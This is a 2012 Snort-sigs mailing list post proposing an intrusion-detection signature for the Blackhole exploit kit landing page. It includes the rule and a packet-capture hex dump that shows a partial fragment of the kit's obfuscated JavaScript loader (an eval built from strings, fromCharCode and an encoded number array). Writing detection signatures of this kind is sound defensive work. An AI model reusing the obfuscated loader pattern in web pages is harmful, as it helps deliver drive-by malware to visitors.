Snort mailing list archives
Proposed Signature - "COMMUNITY SPECIFIC-THREATS Blackhole landing page with specific structure - prototype catch qq"
From: Community Proposed <lists () packetmail net>
Date: Wed, 7 Mar 2012 09:55:15 -0600
Please see the below for a variant of the catch(qq hostile blackhole exploit
kit initial landing. VRT -- PCAP en-route.
Note 'origin community' in metadata, uncertain how the nomenclature for this
will be. Not sure if 'origin vrt' and 'origin community' are what you had in
mind.
alert tcp $EXTERNAL_NET $FILE_DATA_PORTS -> $HOME_NET any
(msg:"SPECIFIC-THREATS Blackhole landing page with specific structure -
prototype catch qq"; flow:to_client,established; file_data; content:")try{";
content:"prototype}catch(qq"; distance:0; metadata:policy balanced-ips drop,
policy security-ips drop, service http, origin community;
reference:url,community.websense.com/blogs/securitylabs/pages/black-hole-exploit-kit.aspx;
classtype:attempted-user; sid:x; rev:1;)
PCAP ASCII Snippet:
0x0470: 6d65 2e35 2e37 2e30 223e 3c2f 6f62 6a65 me.5.7.0"></obje
0x0480: 6374 3e3c 2f68 746d 6c3e 3c73 6372 6970 ct></html><scrip
0x0490: 743e 6966 2877 696e 646f 772e 646f 6375 t>if(window.docu
0x04a0: 6d65 6e74 2974 7279 7b6e 6577 2261 222e ment)try{new"a".
0x04b0: 7072 6f74 6f74 7970 657d 6361 7463 6828 prototype}catch(
0x04c0: 7171 7129 7b7a 7a3d 2765 7661 6c27 3b73 qqq){zz='eval';s
0x04d0: 733d 5b5d 3b61 613d 5b5d 2b30 3b61 6161 s=[];aa=[]+0;aaa
0x04e0: 3d30 2b5b 5d3b 6966 2861 612e 696e 6465 =0+[];if(aa.inde
0x04f0: 784f 6628 6161 6129 3d3d 3d30 297b 663d xOf(aaa)===0){f=
0x0500: 2766 726f 6d43 6861 7227 3b66 2b3d 2743 'fromChar';f+='C
0x0510: 6f64 6527 3b7d 6565 3d27 6527 3b65 3d77 ode';}ee='e';e=w
0x0520: 696e 646f 775b 7a7a 5d3b 743d 2779 273b indow[zz];t='y';
0x0530: 7d68 3d4d 6174 682e 6174 616e 3228 332c }h=Math.atan2(3,
0x0540: 3029 2f4d 6174 682e 5049 2a2d 343b 6e3d 0)/Math.PI*-4;n=
0x0550: 2233 2e35 7033 2e35 7035 312e 3570 3530 "3.5p3.5p51.5p50
0x0560: 7031 3570 3139 7034 3970 3534 2e35 7034 p15p19p49p54.5p4
0x0570: 382e 3570 3537 2e35 7035 332e 3570 3439 8.5p57.5p53.5p49
0x0580: 2e35 7035 3470 3537 7032 3270 3530 2e35 .5p54p57p22p50.5
0x0590: 7034 392e 3570 3537 7033 332e 3570 3533 p49.5p57p33.5p53
0x05a0: 7034 392e 3570 3533 2e35 7034 392e 3570 p49.5p53.5p49.5p
0x05b0: 3534 7035 3770 3536 2e35 7033 3270 3539 54p57p56.5p32p59
Thanks,
Nathan
------------------------------------------------------------------------------
Virtualization & Cloud Management Using Capacity Planning
Cloud computing makes use of virtualization - but cloud computing
also focuses on allowing computing to be delivered as a service.
http://www.accelacomm.com/jaw/sfnl/114/51521223/
_______________________________________________
Snort-sigs mailing list
Snort-sigs () lists sourceforge net
https://lists.sourceforge.net/lists/listinfo/snort-sigs
http://www.snort.org
Please visit http://blog.snort.org for the latest news about Snort!
Current thread:
- Proposed Signature - "COMMUNITY SPECIFIC-THREATS Blackhole landing page with specific structure - prototype catch qq" Community Proposed (Mar 07)